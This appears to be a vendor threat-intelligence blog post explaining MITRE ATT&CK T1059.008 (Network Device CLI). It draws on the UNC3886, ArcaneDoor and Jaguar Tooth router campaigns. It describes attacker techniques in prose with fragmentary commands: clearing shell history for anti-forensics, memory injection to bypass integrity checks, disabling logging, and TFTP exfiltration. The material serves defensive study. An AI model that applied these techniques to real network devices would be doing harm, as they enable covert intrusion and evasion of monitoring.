.svg)
.svg)
T1059.008 Network Device CLI in MITRE ATT&CK Explained
| March 12, 2026
What Is T1059.008 Network Device CLI in MITRE ATT&CK?
T1059.008 Network Device CLI is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of command-line interfaces (CLIs) on network devices to execute commands and manage device functionality.
Network device CLIs are commonly used by administrators to configure, monitor, and maintain infrastructure components such as routers, switches, firewalls, and other network appliances. Access is typically achieved through a terminal emulator connecting to the device’s IP address using authenticated credentials. Once logged in, users can issue device-specific commands to view system status, modify configurations, inspect traffic statistics, or manage network services.
To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.
Adversary Use of T1059.008 Network Device CLI
Adversaries use T1059.008 Network Device CLI to execute malicious commands on network devices by abusing legitimate administrative interfaces. After gaining access through compromised credentials, exposed management services, or misconfigured authentication mechanisms, attackers can interact directly with the device’s CLI.
In attack campaigns, adversaries leverage network device CLIs to alter configurations, disable security controls, create unauthorized accounts, establish persistence, or redirect network traffic. Because these actions are performed through native management interfaces, they may bypass endpoint-focused security controls and remain undetected in environments where network device activity is insufficiently logged or monitored.
Procedure Examples Used by Adversaries in Red Report 2026
Network device Command Line Interface (CLI) represents a common focal point for adversaries seeking to manipulate the functionality of network devices.
For instance, beginning in March 2025, security researchers reported on the China-nexus espionage group UNC3886 deploying custom backdoors (including TINYSHELL variants) on Juniper Networks Junos OS routers [1]. This campaign showcases deep knowledge of network device internals.
The malicious TTPs rely heavily on the Junos OS shell mod, an underlying FreeBSD shell accessible from the Junos CLI, to bypass security features and deploy rootkit-like malware for long-term persistence and covert espionage.
Below is a technical explanation of how UNC3886 leverages network device command line interfaces.
Persistence and Stealth via Shell Commands
The primary adversarial goal is to gain highly-privileged access to the underlying operating system shell, which is then used to subvert the device's integrity control mechanism (Veriexec) and deploy the backdoor.
The threat actor must first gain shell access (usually through compromised management credentials or a terminal server) from the standard Junos CLI. Once in the shell, they use standard Unix-like commands to execute their malicious code, bypassing the operating system's integrity checks.
|
Adversary Goal |
Recovered Shell Command TTPs |
|
Bypass Integrity Control |
Inject malicious code into the memory of a trusted process to circumvent the Veriexec file integrity system. This is done using commands like cat, mkfifo, and dd to manipulate process memory. |
|
Code Injection Setup |
Create a named pipe (null) to create a "hung" process (cat) for memory injection. |
|
Anti-Forensics |
Clear the user's history file to eliminate traces of the commands used during the compromise session. |
Clearing Shell History for Anti-Forensics
A critical anti-forensics step observed in the UNC3886 campaign is the immediate removal of command history to ensure that the initial stages of the exploit (which involve complex file and memory manipulation) are not recorded on the device's persistent storage.
The following commands, executed from the underlying FreeBSD shell mode, demonstrate how the adversary ensures their actions, including the initial memory injection, are immediately erased from the history logs.
|
# Sets the shell history file variable to an empty string. |
By leveraging the underlying shell accessible through the Juniper CLI, the adversary moves from a network configuration state to an operating system exploitation state, enabling the deployment of persistent, low-level malware.
Procedure Examples Used by Adversaries in Red Report 2025
ArcaneDoor Campaign
In April 2024, researchers uncovered the "ArcaneDoor" campaign, where state-sponsored actors exploited vulnerabilities in Cisco Adaptive Security Appliances (ASA) and Firepower Threat Defense (FTD) software.
In this espionage-focused campaign, adversaries exploited the network device CLI (Command Line Interface) to manipulate and control compromised perimeter network devices. Using their custom malware, "Line Dancer," the attackers executed specific commands to modify configurations, exfiltrate data, and maintain stealth. By issuing commands like show configuration, they extracted detailed device configurations, enabling further reconnaissance and lateral movement. The attackers also disabled logging through CLI to avoid detection and conceal their activities. Additionally, they used the CLI to create and exfiltrate packet captures, providing insights into network traffic. Commands like write mem were employed to save malicious changes to the device's memory, ensuring persistence. These malicious actions leveraged the CLI's legitimate functionality to execute their espionage operations effectively.
|
# Display the current configuration of the device |
These commands showcase how the attackers leveraged the CLI to perform reconnaissance, modify system behavior, and exfiltrate critical data while evading detection.
Procedure Examples Used by Adversaries in Red Report 2024
Adversaries commonly leverage Network Device CLIs for executing remote code and exfiltrating data, exploiting these interfaces as critical vectors for cyber attacks and network surveillance.
For instance, as disclosed in April 2023, Russian state-sponsored APT28 hackers have been deploying 'Jaguar Tooth,' a custom malware on Cisco IOS routers, which particularly exploits the CLI of these devices [2]. Once installed, this malware creates a process named 'Service Policy Lock' that executes a series of CLI commands, such as 'show running-config,' 'show version,' and several others, to collect detailed information about the router's configuration and network environment.
|
show running-config |
This data is then exfiltrated using TFTP, enabling the hackers to gain extensive insight into the network infrastructure. This tactic exemplifies adversaries' strategic use of network device CLI for espionage and surveillance purposes, highlighting the criticality of securing network device interfaces against unauthorized access.
Validate Your Defenses Against the Red Report 2026 Threats
References
[1] “Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers,” Google Cloud Blog, Mar. 12, 2025. Available: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers. [Accessed: Dec. 02, 2025]
[2] L. Abrams, “US, UK warn of govt hackers using custom malware on Cisco routers,” BleepingComputer, Apr. 18, 2023. Available: https://www.bleepingcomputer.com/news/security/us-uk-warn-of-govt-hackers-using-custom-malware-on-cisco-routers/. [Accessed: Dec. 21, 2023]
